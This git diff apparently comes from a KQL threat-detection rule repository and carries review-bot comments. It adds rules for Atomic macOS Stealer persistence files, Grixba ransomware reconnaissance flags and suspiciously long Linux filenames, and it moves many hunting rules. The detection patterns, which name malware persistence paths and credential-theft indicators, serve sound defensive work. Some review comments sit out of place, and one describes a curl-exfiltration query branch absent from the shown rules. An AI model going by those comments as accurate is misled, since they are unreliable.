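Review bot: The header keeps `// MITRE Tactic: Execution` and tags only `attack.t1059.002`, yet the first OR branch of the `where` clause matches a curl POST of `/tmp/out.zip` to a remote server, which the Description itself calls data exfiltration; the tactic line and tags should cover that half of the rule, e.g. `// Tags: attack.execution, attack.t1059.002, attack.exfiltration, attack.t1041, detection.emerging-threats`. In that branch `contains "curl"`, `contains "POST"` and `contains "-H "` are short, case-insensitive tokens, so the branch's precision rests on `BuildID`, `file=@/tmp/out.zip` and `cl: 0` appearing together; a one-line comment above the query naming those as the discriminating indicators would help whoever tunes it later. The file also ends without a trailing newline (`\ No newline at end of file`), as do the new persistence_indicators, grixba and long_filename_pattern files in this commit.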
@@ -0,0 +1,10 @@
+// Title: Atomic MacOS Stealer - Persistence Indicators
+// Author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
+// Date: 2025-11-22
+// Level: high
+// Description: Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1564.001, attack.t1543.004, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath =~ "/Library/LaunchDaemons/com.finder.helper.plist" or (InitiatingProcessFolderPath endswith "/curl" and FolderPath endswith ".helper" and FolderPath startswith "/Users/")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/Grixba/grixba_malware_reconnaissance_activity.kql b/KQL/rules-emerging-threats/2025/Malware/Grixba/grixba_malware_reconnaissance_activity.kql
new file mode 100644
index 00000000..bbdd647f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Grixba/grixba_malware_reconnaissance_activity.kql
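Review bot: The query reads from `DeviceFileEvents` without an `ActionType` filter, so it fires on modification, rename and deletion of `/Library/LaunchDaemons/com.finder.helper.plist` and of the `.helper` files as well, while the Description says `Detects creation`; if creation is the intent, add `and ActionType == "FileCreated"` to the `where`, otherwise reword the Description so an analyst knows that any touch of these paths (including cleanup) is expected to alert. The second branch, `InitiatingProcessFolderPath endswith "/curl" and FolderPath endswith ".helper" and FolderPath startswith "/Users/"`, is the part most likely to need tuning, and the header only says "these" artifacts; a comment naming which dropped component that pattern stands for would make triage easier.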
@@ -0,0 +1,13 @@
+// Title: Grixba Malware Reconnaissance Activity
+// Author: yxinmiracle, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-26
+// Level: high
+// Description: Detects execution of the Grixba reconnaissance tool based on suspicious command-line parameter combinations.
+// This tool is used by the Play ransomware group for network enumeration, data gathering, and event log clearing.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1595.001, attack.discovery, attack.t1046, detection.emerging-threats
+// False Positives:
+// - Legitimate tools that use similar command-line argument structures (e.g., a tool with '--mode scan' and '--input file.txt') could trigger this rule. However, the specific combinations are indicative of reconnaissance or defense evasion.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-i " or ProcessCommandLine contains "-input " or ProcessCommandLine contains "-i:" or ProcessCommandLine contains "-input:") and (ProcessCommandLine contains ":f " or ProcessCommandLine contains ":r " or ProcessCommandLine contains ":s " or ProcessCommandLine contains " f " or ProcessCommandLine contains " r " or ProcessCommandLine contains " s ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "-mode " or ProcessCommandLine contains "-m:" or ProcessCommandLine contains "-mode:") and (ProcessCommandLine contains "scan " or ProcessCommandLine contains "scanall ")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql b/KQL/rules-emerging-threats/2025/Malware/Katz-Stealer/katz_stealer_dll_loaded.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql
rename to KQL/rules-emerging-threats/2025/Malware/Katz-Stealer/katz_stealer_dll_loaded.kql
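Review bot: Every argument token in the `where` clause is anchored on a trailing space (`"-i "`, `"-m "`, `"scan "`, `"scanall "`), so a command line whose final argument is the mode value, e.g. one ending in `-mode scan`, fails the last group and is missed; a regex that also accepts end-of-string, such as `ProcessCommandLine matches regex @"(?i)-(m|mode)[ :]scan(all)?(\s|$)"`, closes that gap for the last group. The middle group (`" f "`, `" r "`, `" s "`) is a single letter between spaces and will be true for a large share of ordinary command lines, so the rule's precision comes almost entirely from the other three groups; the False Positives section should say so rather than call the combination "indicative". Also, Reconnaissance in ATT&CK is the pre-compromise tactic; a tool run inside the network for enumeration maps to Discovery, and `attack.t1046` is already in the tags, so `// MITRE Tactic: Reconnaissance` is arguably the wrong primary tactic.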
diff --git a/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql b/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_malicious_github_workflow_creation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql
rename to KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_malicious_github_workflow_creation.kql
diff --git a/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql b/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql
rename to KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql
diff --git a/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql b/KQL/rules-emerging-threats/2025/Malware/funklocker_ransomware_file_creation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql
rename to KQL/rules-emerging-threats/2025/Malware/funklocker_ransomware_file_creation.kql
diff --git a/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql b/KQL/rules-emerging-threats/2025/Malware/kalambur_backdoor_curl_tor_socks_proxy_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql
rename to KQL/rules-emerging-threats/2025/Malware/kalambur_backdoor_curl_tor_socks_proxy_execution.kql
diff --git a/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql b/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql
deleted file mode 100644
index 558e1712..00000000
--- a/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Title: MacOS FileGrabber Infostealer
-// Author: Jason Phang Vern - Onn (Gen Digital)
-// Date: 2025-09-12
-// Level: high
-// Description: Detects execution of FileGrabber on macOS, which is associated with Amos infostealer campaigns targeting sensitive user files.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.002, detection.emerging-threats
-
-DeviceProcessEvents
-| where ProcessCommandLine contains "FileGrabber" and ProcessCommandLine contains "/tmp"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/linux/file/file_event/potentially_suspicious_long_filename_pattern_linux.kql b/KQL/rules-threat-hunting/linux/file/file_event/potentially_suspicious_long_filename_pattern_linux.kql
new file mode 100644
index 00000000..33bcdce3
--- /dev/null
+++ b/KQL/rules-threat-hunting/linux/file/file_event/potentially_suspicious_long_filename_pattern_linux.kql
@@ -0,0 +1,14 @@
+// Title: Potentially Suspicious Long Filename Pattern - Linux
+// Author: @kostastsale
+// Date: 2025-11-22
+// Level: low
+// Description: Detects the creation of files with unusually long filenames (100 or more characters), which may indicate obfuscation techniques used by malware such as VShell.
+// This is a hunting rule to identify potential threats that use long filenames to evade detection. Keep in mind that on a legitimate system, such long filenames can and are common. Run this detection in the context of threat hunting rather than alerting.
+// Adjust the threshold of filename length as needed based on your environment.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004, attack.defense-evasion, attack.t1027, detection.threat-hunting
+// False Positives:
+// - Legitimate files with long filenames.
+
+DeviceFileEvents
+| where FolderPath matches regex "[^/]{100,}$" and (not((FolderPath startswith "/run/systemd/units/invocation:systemd-fsck@" or FolderPath startswith "/sys/firmware/" or FolderPath startswith "/var/log/journal/")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql b/KQL/rules-threat-hunting/linux/file/file_event/python_path_configuration_file_creation_linux.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql
rename to KQL/rules-threat-hunting/linux/file/file_event/python_path_configuration_file_creation_linux.kql
diff --git a/KQL/rules-threat-hunting/Discovery/process_discovery.kql b/KQL/rules-threat-hunting/linux/process_creation/process_discovery.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Discovery/process_discovery.kql
rename to KQL/rules-threat-hunting/linux/process_creation/process_discovery.kql
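Review bot: The header tells the reader to `Adjust the threshold of filename length as needed`, but the threshold is buried inside the regex literal `"[^/]{100,}$"`, which is easy to misread; `strlen(FileName) >= 100` states the same condition directly on the filename column (assuming `FileName` is populated for these Linux events) and makes the number obvious to tune. The `(not((...)))` double parentheses around the exclusion list are noise; `and not (FolderPath startswith "/run/systemd/units/invocation:systemd-fsck@" or FolderPath startswith "/sys/firmware/" or FolderPath startswith "/var/log/journal/")` reads the same. The tactic line `// MITRE Tactic: Execution` with `attack.t1059.004` sits oddly on a file-creation hunting rule whose own Description is about obfuscation to evade detection; `attack.defense-evasion` / `attack.t1027`, already in the tags, is the better primary.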
diff --git a/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql b/KQL/rules-threat-hunting/linux/process_creation/terminate_linux_process_via_kill.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql
rename to KQL/rules-threat-hunting/linux/process_creation/terminate_linux_process_via_kill.kql
diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql b/KQL/rules-threat-hunting/macos/file/file_event/python_path_configuration_file_creation_macos.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql
rename to KQL/rules-threat-hunting/macos/file/file_event/python_path_configuration_file_creation_macos.kql
diff --git a/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql b/KQL/rules-threat-hunting/macos/process_creation/clipboard_data_collection_via_pbpaste.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql
rename to KQL/rules-threat-hunting/macos/process_creation/clipboard_data_collection_via_pbpaste.kql
diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_browser_credential_files_by_uncommon_applications.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql
rename to KQL/rules-threat-hunting/windows/file/file_access/access_to_browser_credential_files_by_uncommon_applications.kql
diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql
rename to KQL/rules-threat-hunting/windows/file/file_access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_reg_hive_files_by_uncommon_applications.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql
rename to KQL/rules-threat-hunting/windows/file/file_access/access_to_reg_hive_files_by_uncommon_applications.kql
diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_sysvol_policies_share_by_uncommon_process.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql
rename to KQL/rules-threat-hunting/windows/file/file_access/access_to_sysvol_policies_share_by_uncommon_process.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_windows_outlook_mail_files_by_uncommon_applications.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql
rename to KQL/rules-threat-hunting/windows/file/file_access/access_to_windows_outlook_mail_files_by_uncommon_applications.kql
diff --git a/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql b/KQL/rules-threat-hunting/windows/file/file_access/unattend_xml_file_access_attempt.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql
rename to KQL/rules-threat-hunting/windows/file/file_access/unattend_xml_file_access_attempt.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql b/KQL/rules-threat-hunting/windows/file/file_delete/ads_zone_identifier_deleted.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql
rename to KQL/rules-threat-hunting/windows/file/file_delete/ads_zone_identifier_deleted.kql
diff --git a/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql b/KQL/rules-threat-hunting/windows/file/file_event/creation_of_an_executable_by_an_executable.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql
rename to KQL/rules-threat-hunting/windows/file/file_event/creation_of_an_executable_by_an_executable.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql b/KQL/rules-threat-hunting/windows/file/file_event/dmp_hdmp_file_creation.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql
rename to KQL/rules-threat-hunting/windows/file/file_event/dmp_hdmp_file_creation.kql
diff --git a/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql b/KQL/rules-threat-hunting/windows/file/file_event/pfx_file_creation.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql
rename to KQL/rules-threat-hunting/windows/file/file_event/pfx_file_creation.kql
diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql b/KQL/rules-threat-hunting/windows/file/file_event/python_path_configuration_file_creation_windows.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql
rename to KQL/rules-threat-hunting/windows/file/file_event/python_path_configuration_file_creation_windows.kql
diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql b/KQL/rules-threat-hunting/windows/file/file_event/scheduled_task_created_filecreation.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql
rename to KQL/rules-threat-hunting/windows/file/file_event/scheduled_task_created_filecreation.kql
diff --git a/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules-threat-hunting/windows/file/file_event/vscode_code_tunnel_execution_file_indicator.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql
rename to KQL/rules-threat-hunting/windows/file/file_event/vscode_code_tunnel_execution_file_indicator.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql b/KQL/rules-threat-hunting/windows/file/file_event/wdac_policy_file_creation_in_codeintegrity_folder.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql
rename to KQL/rules-threat-hunting/windows/file/file_event/wdac_policy_file_creation_in_codeintegrity_folder.kql
diff --git a/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql b/KQL/rules-threat-hunting/windows/file/file_event/webdav_temporary_local_file_creation.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql
rename to KQL/rules-threat-hunting/windows/file/file_event/webdav_temporary_local_file_creation.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/image_load/amsi_dll_load_by_uncommon_process.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql
rename to KQL/rules-threat-hunting/windows/image_load/amsi_dll_load_by_uncommon_process.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/image_load/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql
rename to KQL/rules-threat-hunting/windows/image_load/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql
diff --git a/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql b/KQL/rules-threat-hunting/windows/image_load/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql
rename to KQL/rules-threat-hunting/windows/image_load/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql
diff --git a/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql b/KQL/rules-threat-hunting/windows/image_load/microsoft_excel_add_in_loaded.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql
rename to KQL/rules-threat-hunting/windows/image_load/microsoft_excel_add_in_loaded.kql
diff --git a/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql b/KQL/rules-threat-hunting/windows/image_load/microsoft_word_add_in_loaded.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql
rename to KQL/rules-threat-hunting/windows/image_load/microsoft_word_add_in_loaded.kql
diff --git a/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql b/KQL/rules-threat-hunting/windows/image_load/system_drawing_dll_load.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql
rename to KQL/rules-threat-hunting/windows/image_load/system_drawing_dll_load.kql
diff --git a/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql b/KQL/rules-threat-hunting/windows/image_load/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
rename to KQL/rules-threat-hunting/windows/image_load/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
diff --git a/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/image_load/wmi_module_loaded_by_uncommon_process.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql
rename to KQL/rules-threat-hunting/windows/image_load/wmi_module_loaded_by_uncommon_process.kql
diff --git a/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql b/KQL/rules-threat-hunting/windows/network_connection/dfsvc_exe_network_connection_to_non_local_ips.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql
rename to KQL/rules-threat-hunting/windows/network_connection/dfsvc_exe_network_connection_to_non_local_ips.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql b/KQL/rules-threat-hunting/windows/network_connection/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql
rename to KQL/rules-threat-hunting/windows/network_connection/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql b/KQL/rules-threat-hunting/windows/network_connection/hh_exe_initiated_http_network_connection.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql
rename to KQL/rules-threat-hunting/windows/network_connection/hh_exe_initiated_http_network_connection.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql b/KQL/rules-threat-hunting/windows/network_connection/msiexec_exe_initiated_network_connection_over_http.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql
rename to KQL/rules-threat-hunting/windows/network_connection/msiexec_exe_initiated_network_connection_over_http.kql
diff --git a/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql b/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_by_powershell_process.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql
rename to KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_by_powershell_process.kql
diff --git a/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql b/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_from_users_public_folder.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql
rename to KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_from_users_public_folder.kql
diff --git a/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql b/KQL/rules-threat-hunting/windows/network_connection/potentially_suspicious_azure_front_door_connection.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql
rename to KQL/rules-threat-hunting/windows/network_connection/potentially_suspicious_azure_front_door_connection.kql
diff --git a/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql b/KQL/rules-threat-hunting/windows/process_creation/arbitrary_command_execution_using_wsl.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql
rename to KQL/rules-threat-hunting/windows/process_creation/arbitrary_command_execution_using_wsl.kql
diff --git a/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/cab_file_extraction_via_wusa_exe.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql
rename to KQL/rules-threat-hunting/windows/process_creation/cab_file_extraction_via_wusa_exe.kql
diff --git a/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql b/KQL/rules-threat-hunting/windows/process_creation/clickonce_deployment_execution_dfsvc_exe_child_process.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql
rename to KQL/rules-threat-hunting/windows/process_creation/clickonce_deployment_execution_dfsvc_exe_child_process.kql
diff --git a/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql b/KQL/rules-threat-hunting/windows/process_creation/cmd_shell_output_redirect.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql
rename to KQL/rules-threat-hunting/windows/process_creation/cmd_shell_output_redirect.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql b/KQL/rules-threat-hunting/windows/process_creation/codepage_modification_via_mode_com.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql
rename to KQL/rules-threat-hunting/windows/process_creation/codepage_modification_via_mode_com.kql
diff --git a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql
rename to KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution.kql
diff --git a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql b/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution_with_custom_useragent.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql
rename to KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution_with_custom_useragent.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql b/KQL/rules-threat-hunting/windows/process_creation/diskshadow_child_process_spawned.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql
rename to KQL/rules-threat-hunting/windows/process_creation/diskshadow_child_process_spawned.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/diskshadow_script_mode_execution.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql
rename to KQL/rules-threat-hunting/windows/process_creation/diskshadow_script_mode_execution.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/dll_call_by_ordinal_via_rundll32_exe.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql
rename to KQL/rules-threat-hunting/windows/process_creation/dll_call_by_ordinal_via_rundll32_exe.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql b/KQL/rules-threat-hunting/windows/process_creation/dynamic_net_compilation_via_csc_exe_hunting.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql
rename to KQL/rules-threat-hunting/windows/process_creation/dynamic_net_compilation_via_csc_exe_hunting.kql
diff --git a/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql b/KQL/rules-threat-hunting/windows/process_creation/elevated_system_shell_spawned.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql
rename to KQL/rules-threat-hunting/windows/process_creation/elevated_system_shell_spawned.kql
diff --git a/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql b/KQL/rules-threat-hunting/windows/process_creation/eventlog_query_requests_by_builtin_utilities.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql
rename to KQL/rules-threat-hunting/windows/process_creation/eventlog_query_requests_by_builtin_utilities.kql
diff --git a/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql b/KQL/rules-threat-hunting/windows/process_creation/execution_from_webserver_root_folder.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql
rename to KQL/rules-threat-hunting/windows/process_creation/execution_from_webserver_root_folder.kql
diff --git a/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/file_download_via_curl_exe.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql
rename to KQL/rules-threat-hunting/windows/process_creation/file_download_via_curl_exe.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql b/KQL/rules-threat-hunting/windows/process_creation/file_or_folder_permissions_modifications.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql
rename to KQL/rules-threat-hunting/windows/process_creation/file_or_folder_permissions_modifications.kql
diff --git a/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql b/KQL/rules-threat-hunting/windows/process_creation/ftp_connection_open_attempt_via_winscp_cli.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql
rename to KQL/rules-threat-hunting/windows/process_creation/ftp_connection_open_attempt_via_winscp_cli.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/headless_process_launched_via_conhost_exe.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql
rename to KQL/rules-threat-hunting/windows/process_creation/headless_process_launched_via_conhost_exe.kql
diff --git a/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql b/KQL/rules-threat-hunting/windows/process_creation/import_new_module_via_powershell_commandline.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql
rename to KQL/rules-threat-hunting/windows/process_creation/import_new_module_via_powershell_commandline.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/windows/process_creation/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql
